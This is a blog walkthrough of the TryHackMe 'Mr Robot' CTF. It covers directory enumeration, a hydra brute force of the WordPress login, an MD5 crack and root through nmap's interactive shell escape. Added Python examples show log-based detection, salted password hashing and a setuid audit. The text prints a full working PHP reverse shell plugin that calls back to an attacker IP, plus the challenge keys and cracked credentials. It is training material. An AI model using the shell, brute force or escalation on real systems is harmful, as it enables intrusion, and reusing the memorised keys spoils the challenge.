
Mr Robot CTF

Ludovic COULON
May 10th, 2020 · 1 min read

TryHackMe | Mr Robot CTF

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Credit to Leon Johnson for creating this machine.

Setup

kali@kali:~$ gobuster dir -u http://10.10.157.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.157.219/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/05/09 16:45:41 Starting gobuster
===============================================================
/images (Status: 301)
/blog (Status: 301)
/sitemap (Status: 200)
/rss (Status: 301)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 301)
/video (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/wp-login (Status: 200)
/intro (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/Image (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/robots (Status: 200)

kali@kali:~$ curl http://10.10.157.219/fsocity.dic > password.txt

#1 What is key 1?

1073403c8a58a1f80d943455fb30724b9

#2 What is key 2?

kali@kali:~$ hydra -l Elliot -P password.txt 10.10.157.219 http-post-form "/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=10.10.157.219/wp-admin/&testcookie=1:S=302"
[80][http-post-form] host: 10.10.157.219 login: "Elliot" password: "ER28-0652"
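The two noisy steps above, the wordlist sweep with gobuster and the hydra run against /wp-login, leave very distinctive traces in the web server's access log, which is where a defender of a box like this would catch them. The script below is an added example, not part of this writeup and not code from gobuster or hydra: it parses combined-format access-log lines and raises an alert for a user agent that names a scanner, for a burst of 404s from one address (a wordlist sweep is mostly misses), and for a burst of POSTs to the login form. The log lines, the addresses (RFC 5737 documentation ranges) and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" format. Assumption: the log uses this layout; adjust the regex otherwise.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Default user agents of common directory scanners; a tool can override its UA, so this is a hint, not proof.
SCANNER_UAS = ("gobuster", "dirbuster", "dirb", "wfuzz", "ffuf")


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(times, window_s):
    """Largest number of events inside any span of window_s seconds (two-pointer sweep)."""
    times = sorted(times)
    best = lo = 0
    for hi, t in enumerate(times):
        while (t - times[lo]).total_seconds() > window_s:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def detect(lines, window_s=60, miss_threshold=20, login_threshold=10):
    """Scan access-log lines and return a list of alerts, one dict per (kind, source IP)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line.rstrip("\n"))
        if rec:
            per_ip[rec["ip"]].append(rec)
    alerts = []
    for ip, recs in sorted(per_ip.items()):
        tools = sorted({r["ua"] for r in recs if r["ua"].lower().startswith(SCANNER_UAS)})
        if tools:
            alerts.append({"kind": "scanner-ua", "ip": ip, "detail": ", ".join(tools)})
        # Directory brute force: the wordlist sweep is mostly misses, so 404s pile up fast.
        misses = [r["ts"] for r in recs if r["status"] == 404]
        n = max_in_window(misses, window_s)
        if n >= miss_threshold:
            alerts.append({"kind": "dir-bruteforce", "ip": ip, "detail": f"{n} x 404 within {window_s}s"})
        # Credential brute force: repeated POSTs to the login form, whatever the result code.
        logins = [r["ts"] for r in recs if r["method"] == "POST" and r["path"].startswith("/wp-login")]
        n = max_in_window(logins, window_s)
        if n >= login_threshold:
            alerts.append({"kind": "login-bruteforce", "ip": ip, "detail": f"{n} x POST /wp-login within {window_s}s"})
    return alerts


def _line(ip, ts, method, path, status, ua):
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'


def build_sample_log():
    """Constructed log: one scanner/brute-forcer (192.0.2.10) and one ordinary visitor (198.51.100.7)."""
    t0 = datetime(2020, 5, 9, 16, 45, 41, tzinfo=timezone.utc)
    lines = [_line("192.0.2.10", t0 + timedelta(seconds=i), "GET", f"/word{i}", 404, "gobuster/3.0.1")
             for i in range(30)]
    lines += [_line("192.0.2.10", t0 + timedelta(minutes=5, seconds=i), "POST", "/wp-login.php", 200, "Mozilla/5.0")
              for i in range(15)]
    lines += [_line("198.51.100.7", t0 + timedelta(minutes=i), "GET", "/blog/", 200, "Mozilla/5.0")
              for i in range(3)]
    return lines


if __name__ == "__main__":
    for a in detect(build_sample_log()):
        print(f"[{a['kind']}] {a['ip']}: {a['detail']}")
```

On a real host the same function runs over the live file, `detect(open("/var/log/apache2/access.log"))`; the thresholds are starting points and should be tuned to the site's normal traffic. The login alert is the one to pair with a mitigation: rate limiting or account lockout on the WordPress login form turns a wordlist of tens of thousands of entries from a minutes-long job into an impractical one.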

Now let's add a PHP reverse shell, wrapped as a WordPress plugin.

<?php
/*
Plugin Name: Reverse Shell
Plugin URI: http://shell.com
Description: gimme a shell
Version: 1.0
Text Domain: shell
Domain Path: /languages
*/
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.9.2.228'; // CHANGE THIS
$port = 9999; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

But first we need to zip shell.php so it can be uploaded as a plugin.

kali@kali:~/Desktop$ zip shell.zip shell.php
adding: shell.php (deflated 59%)

Great, we successfully uploaded our PHP shell! Let's activate it.

Nice! :D We have a shell; now let's upgrade it to a proper TTY.

python -c 'import pty; pty.spawn("/bin/bash")'

As you can see, we can't read key 2 yet, but we have a hash, so let's crack it.

kali@kali:~/Desktop$ hashcat -m 0 --force hashmrrobot /usr/share/wordlists/rockyou.txt
c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
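Key 2 was guarded by nothing more than a raw, unsalted MD5 of the password, which is exactly why one hashcat pass over rockyou recovers it. The script below is an added example, not part of this writeup: it reproduces the check hashcat mode 0 performs against that digest using a four-entry constructed wordlist, then shows the storage scheme that would have resisted it, a random per-user salt plus a deliberately slow KDF (PBKDF2-HMAC-SHA256 from Python's standard hashlib) and a constant-time comparison on verify. The digest and password are the ones shown above; the wordlist, the record format and the iteration count are assumptions of the example.

```python
import hashlib
import hmac
import os

# Values from the walkthrough: the digest in password.raw-md5 and the password hashcat recovered.
LEAKED_MD5 = "c3fcd3d76192e4007dfb496cca67e13b"
# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "123456", "abcdefghijklmnopqrstuvwxyz", "letmein"]


def raw_md5(password):
    """Unsalted MD5, i.e. what password.raw-md5 holds (hashcat -m 0)."""
    return hashlib.md5(password.encode()).hexdigest()


def recover_raw_md5(digest, wordlist):
    """Why a raw MD5 falls immediately: one fast hash per candidate and no salt, so every
    wordlist entry can be tried (or precomputed once) against every leaked digest."""
    for candidate in wordlist:
        if hmac.compare_digest(raw_md5(candidate), digest):
            return candidate
    return None


def hash_password(password, iterations=600_000, salt=None):
    """Hardened storage: 16 random salt bytes and a slow KDF. The record carries its own
    parameters (algo$iterations$salt$digest) so they can be raised later without a reset."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), digest_hex)


if __name__ == "__main__":
    print("raw md5 recovered:", recover_raw_md5(LEAKED_MD5, WORDLIST))
    a = hash_password("abcdefghijklmnopqrstuvwxyz")
    b = hash_password("abcdefghijklmnopqrstuvwxyz")
    print("same password, two different records:", a != b)
    print("verify with the right password:", verify_password("abcdefghijklmnopqrstuvwxyz", a))
```

The salt defeats precomputation (the same password yields a different record for every user), and the iteration count makes each guess cost hundreds of thousands of hash operations instead of one, which is the difference between rockyou finishing in seconds and not finishing at all. A memory-hard function such as scrypt or Argon2 is the stronger choice where it is available; PBKDF2 is used here only because it ships with the standard library.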

#3 What is key 3?

su -l robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

Final step: getting root on the machine.

On the TryHackMe website the hint was "nmap".

So I found this page, https://pentestlab.blog/category/privilege-escalation/, and it worked! :D

robot@linux:~$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# ls
ls
key-2-of-3.txt password.raw-md5
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
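The `#` prompt after `!sh` means nmap itself was running as root; the usual cause, and the first thing to check when hardening a host like this one, is a set-user-ID bit on a binary that offers a shell escape. The script below is an added audit example, not part of this writeup: it does what `find / -perm -4000 -type f` does and sorts each finding into expected, shell-escape (a privilege-escalation candidate) or unknown. The two name lists are constructed for illustration and should be replaced by the distribution's real baseline, and `demo_tree()` builds a throwaway directory holding a fake setuid nmap so the audit can be exercised without root.

```python
import os
import stat
import tempfile

# Constructed baselines. EXPECTED_SUID: binaries that are normally setuid on a Linux host.
# SHELL_ESCAPE: binaries that hand the caller a shell or arbitrary file access when run
# as root (nmap's interactive "!sh" is the case from this box). A real audit uses the
# package manager's file list as the baseline instead of a hand-written set.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "newgrp", "chsh", "gpasswd"}
SHELL_ESCAPE = {"nmap", "vim", "vi", "find", "bash", "sh", "python", "perl", "less", "more", "awk"}


def is_setuid(path):
    """True for a regular file (symlinks not followed) whose mode carries the set-user-ID bit."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_setuid(root):
    """Walk root and return every setuid regular file, like `find ROOT -perm -4000 -type f`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if is_setuid(path):
                    hits.append(path)
            except OSError:
                continue  # unreadable or vanished entry: skip it rather than abort the audit
    return sorted(hits)


def classify(paths):
    """Bucket setuid files as 'expected', 'shell-escape' (priv-esc candidate) or 'unknown'."""
    report = {"expected": [], "shell-escape": [], "unknown": []}
    for path in paths:
        name = os.path.basename(path)
        if name in SHELL_ESCAPE:
            report["shell-escape"].append(path)
        elif name in EXPECTED_SUID:
            report["expected"].append(path)
        else:
            report["unknown"].append(path)
    return report


def audit(root="/"):
    return classify(find_setuid(root))


def demo_tree():
    """Constructed fixture: a temp tree with a setuid nmap, a setuid passwd and a plain ls."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    for name, mode in (("nmap", 0o4755), ("ls", 0o755), ("passwd", 0o4755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)  # the owner may set the setuid bit on their own file
    return root


if __name__ == "__main__":
    for bucket, paths in audit(demo_tree()).items():
        print(f"{bucket}: {paths}")
```

For a real host, call `audit("/")` (as root, so that every directory is readable) and treat anything in the shell-escape or unknown bucket as a finding to remove the bit from (`chmod u-s`) or to justify. Scheduling the walk and diffing its output against the last run turns it into a simple detection for a newly planted setuid binary.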

© 2020 Ludovic COULON